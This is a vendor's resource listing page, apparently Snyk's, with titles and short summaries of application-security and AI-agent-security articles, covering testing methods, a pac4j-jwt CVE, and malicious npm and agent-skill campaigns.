Skip to main content

Ressourcen

White paper

From First Prompt to Final Fix: How Snyk Secures AI-Driven Development

Jetzt lesen

Report

Unifying Control for Agentic AI With Evo By Snyk

Jetzt lesen

Artikel

From SKILL.md to Shell Access in Three Lines of Markdown: Threat Modeling Agent Skills

Jetzt lesen
Typ
Thema

Anzeige 1 - 24 von 362 ressourcen

Article

Inside StegaBin: How a DPRK Steganography Campaign Generated Headlines

North Korean hackers published 26 malicious npm packages using Pastebin steganography for C2. It made headlines everywhere. We checked the data: zero real-world impact. Here's what the campaign actually did, and what it tells us about the real risk of malicious package campaigns.

Article

CVE-2026-29000: How a Public Key Breaks Authentication in pac4j-jwt

CVE-2026-29000 is a CVSS 10.0 authentication bypass in pac4j-jwt that lets attackers forge admin tokens using only the server's RSA public key. Learn how the vulnerability works, whether you're affected, and how to fix it.

Article

Accelerating Public Sector Modernization with Secure AI-Driven Migration

Learn how generative AI accelerates legacy application migration for the public sector—and how Snyk secures AI-generated code, dependencies, containers, and cloud infrastructure from code to cloud.

Article

DAST vs. Penetration Testing: 5 Key Differences

Deciding between DAST and penetration testing is vital for securing modern APIs and microservices. Learn how to combine these methodologies to build a robust, layered security strategy that protects your entire application portfolio.

Article

Top 8 Claude Skills for UI/UX Engineers

Explore the top Claude Skills transforming UI/UX engineering by automating repetitive tasks like accessibility audits and component scaffolding. Discover how to streamline your workflow and focus on the creative decisions that truly matter.

Article

Top 8 Claude Skills for Developers

From Manus-style task planning to Terraform code generation and Core Web Vitals optimization, these 8 Claude Skills give developers repeatable AI-powered workflows for real engineering work.

Article

Six Principles for Rethinking DevSecOps for AI

The 6 factors are: Developer-First AI Security, Secure AI by Design, Shared AI Accountability, Automated AI Security, AI-Specific Intelligence, and AI Governance & Continuous Improvement

Article

Your AI "Skills" Are the New Agentic Attack Surface

As AI moves beyond simple chat to autonomous execution, the skills powering these agents have emerged as a dangerous new attack surface. Learn how to protect your organization from malicious AI agent tools while maintaining development velocity in the age of agentic workflows.

Article

Anthropic Just Launched Claude Code Security. Here's Why That's Great News for the Industry

Anthropic's launch of Claude Code Security is sparking headlines about the end of traditional security, but the real story is about the shift from detection to automated remediation. This move validates a layered security approach that combines AI reasoning with deterministic analysis to protect the modern software supply chain.

Article

Building Safer AI Agents with Structured Outputs

Learn how structured outputs help developers build safer, more reliable AI agents by enforcing strict schemas during token generation. Discover the essential frameworks and security tools needed to move your AI agents to an enforcement-based production environment.

Article

SAST vs. DAST vs. IAST vs. RASP: Understanding Application Security Testing Methods

Navigate the key differences between SAST, DAST, IAST, and RASP. This guide explains how to integrate these testing methods throughout the software development lifecycle to eliminate blind spots and block real-time attacks.

Article

BOLA: The API Vulnerability Hiding in Plain Sight

Discover why Broken Object Level Authorization (BOLA) is the #1 OWASP API risk. Learn why traditional testing tools fail to test this "hidden" flaw properly and how Snyk’s AI-powered DAST provides the context needed to stop data breaches.

Article

How AI Agents Still Break Security When Nothing Is Broken

AI agents can fail security without any bugs or vulnerabilities. Learn why agent behavior breaks trust boundaries and how threat modeling mitigates risk.

Article

4 Reasons Why Dynamic Security Testing Is Critical For All Your Assets

Attackers don't just target your crown jewels; they look for the weakest link in your entire application footprint. Limiting dynamic security testing to tier-one apps leaves dangerous blind spots across forgotten APIs and internal tools. Discover why universal DAST is critical for modern risk management and how it helps teams uncover hidden vulnerabilities before they become entry points for a breach.

Article

Inside the 'clawdhub' Malicious Campaign: AI Agent Skills Drop Reverse Shells on OpenClaw Marketplace

Snyk security researchers have uncovered the clawdhub malicious campaign targeting the ClawHub AI marketplace with Trojanized skills that drop reverse shells. This sophisticated attack uses social engineering and obfuscated scripts to compromise hosts via AI agent capabilities on Windows and macOS. Learn how to identify these threats and secure your AI supply chain against evolving agentic workflow risks.

Article

From SKILL.md to Shell Access in Three Lines of Markdown: Threat Modeling Agent Skills

Discover the lethal trifecta of AI agent security risks. Learn how malicious OpenClaw Skills and supply chain attacks like ClawHavoc put your data at risk. Threat model your AI agents and secure them with Snyk Evo.

Article

Your Clawdbot (OpenClaw) AI Assistant Has Shell Access and One Prompt Injection Away from Disaster

Is your personal AI assistant secure? Dive into the agentic security risks of Clawdbot: prompt injection, supply chain, and network exposure. Discover Snyk's tools to secure your agents.

Article

DAST vs RASP: Understanding the Differences in Application Security

Understand the critical differences between DAST and RASP to build a robust application security strategy. This guide explores how DAST proactively identifies vulnerabilities before deployment while RASP provides real-time protection during runtime. Learn how to leverage both technologies to create a layered defense for your modern software stack.

Article

5 Benefits of Using SAST and DAST Together

Discover why combining SAST and DAST is essential for comprehensive application security, from early code analysis to runtime validation. By integrating both methodologies, teams can reduce false positives, lower remediation costs, and automate security within CI/CD pipelines. Learn how to bridge the gap between development and security to build faster and more securely.

Article

Building Secure MCP Servers: A Developer's Guide to Avoiding Critical Vulnerabilities

Article

Cloud Network Security: Best Practices & Essential Strategies for Protecting Modern Cloud Infrastructure

Modern cloud security requires moving beyond traditional perimeters to embrace Zero Trust, AI-driven threat detection, and quantum-safe encryption. This guide outlines essential strategies for mitigating misconfigurations and managing the shared responsibility model. Learn how to automate your incident response to stay ahead of evolving DDoS and AI-weaponized attacks.

Article

CSPM vs SSPM: Understanding the Differences and When You Need Both

Understand the critical differences between CSPM and SSPM and why modern enterprises need both to secure their cloud infrastructure and SaaS applications. While CSPM focuses on IaaS and PaaS security, SSPM targets risks within SaaS platforms like Microsoft 365 and Salesforce.

Article

Debunking the Top 5 Myths About DAST

Modern Dynamic Application Security Testing (DAST) has evolved far beyond its outdated reputation for being slow or noisy. This guide debunks five common myths, demonstrating how AI-driven DAST provides fast, automated runtime security that catches critical vulnerabilities static analysis often misses.

Article

From SBOM to AI-BOM: Rethinking Visibility in AI-Native Systems

AI supply chains move too fast for SBOMs. Learn why AI-BOM is becoming the foundation for AI security and governance.